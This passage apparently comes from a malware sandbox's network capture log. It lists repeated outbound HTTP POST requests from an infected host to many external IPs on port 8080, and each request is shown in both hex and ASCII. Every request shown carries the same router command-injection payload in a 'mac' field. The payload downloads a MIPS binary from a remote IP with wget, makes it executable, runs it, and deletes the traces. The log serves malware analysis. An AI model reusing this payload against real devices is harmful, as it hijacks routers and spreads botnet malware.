                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3071192.168.2.2334178191.136.121.2178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506850958 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3072192.168.2.2344702216.189.217.1778080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506901026 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3073192.168.2.2345626195.182.109.2078080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506925106 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3074192.168.2.2349670145.71.228.1298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506942034 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3075192.168.2.2356356207.196.85.2328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506974936 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3076192.168.2.2333316211.111.125.08080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506993055 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3077192.168.2.2360888182.217.252.1268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507014036 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3078192.168.2.2343678111.36.37.398080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507040977 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3079192.168.2.2347214111.72.56.528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507071018 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3080192.168.2.235727048.120.207.2458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507133961 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3081192.168.2.2345856211.240.2.1378080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507157087 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3082192.168.2.2350362183.254.120.598080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507399082 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3083192.168.2.2346006112.185.89.598080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507474899 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3084192.168.2.235992090.93.188.1168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507714987 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3085192.168.2.2350138221.7.150.1878080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507762909 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3086192.168.2.233952644.222.45.1498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507858992 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3087192.168.2.2355062196.60.37.2198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507884026 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3088192.168.2.23488069.185.127.1828080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507893085 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3089192.168.2.233808243.2.151.1188080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507919073 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3090192.168.2.2357986100.8.237.268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507937908 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3091192.168.2.2350226207.66.70.2248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.507957935 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3092192.168.2.2347140165.75.72.2028080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508003950 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3093192.168.2.235262851.239.61.428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508023024 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
